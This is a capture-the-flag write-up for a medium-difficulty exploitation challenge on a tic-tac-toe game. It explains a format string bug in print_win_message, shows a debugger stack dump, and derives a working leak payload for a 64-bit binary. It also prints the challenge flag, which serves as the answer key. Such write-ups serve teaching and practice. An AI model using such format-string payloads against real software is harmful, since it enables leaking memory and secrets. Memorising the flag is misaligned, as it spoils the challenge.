1.8 KiB
Difficulty
50/100 | MEDIUM
Simple format string attack, this is not groundbreaking stuff.
Category
Exploitation
How To Solve
There is a format string vulnerability in the print_win_message function.
The name the user inputs at the beginning of the game is printed here using
printf without any validation. This means we can leak data from the stack.
It also happens that the flag is on the stack.
To leak the flag we are going to use the %s format string specifier. The
problem is that there are a couple of values on the stack before that, for
example the stack looks like this right before the printf call:
00:0000│ rsp 0x7fffffffd250 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
01:0008│-018 0x7fffffffd258 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
02:0010│-010 0x7fffffffd260 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
03:0018│-008 0x7fffffffd268 —▸ 0x55555555667f ◂— 'IGCTF{REDACTED}'
04:0020│ rbp 0x7fffffffd270 —▸ 0x7fffffffd2b0 —▸ 0x7fffffffd2e0 —▸ 0x7fffffffd380 —▸ 0x7fffffffd3e0 ◂— ...
05:0028│+008 0x7fffffffd278 —▸ 0x555555555b64 (play_game+240) ◂— mov rax, qword ptr [rbp - 0x18]
06:0030│+010 0x7fffffffd280 —▸ 0x555555559740 —▸ 0x5555555596b0 ◂— '%x%x%x%s'
07:0038│+018 0x7fffffffd288 —▸ 0x555555559720 —▸ 0x55555555670b ◂— 'Xx_TicTacToesKing69_xX'
So we need to pop off, 3 64 bit ints before we reach the flag. Which means we would
need the following payload %p%p%p%s. This would work on a 32 bit machine but since
this is a 64 bit binary, the first 6 arguments are passed via register. This means
we need to "pop off" an additional 5 arguments (the first argument is the format
string itself) giving us the final payload string:
%p%p%p%p%p%p%p%p%s
Flag
IGCTF{W3ll_y0u_st1ll_l0st_BuT_at_l3ast_yoU_g0t_th3_fl4g}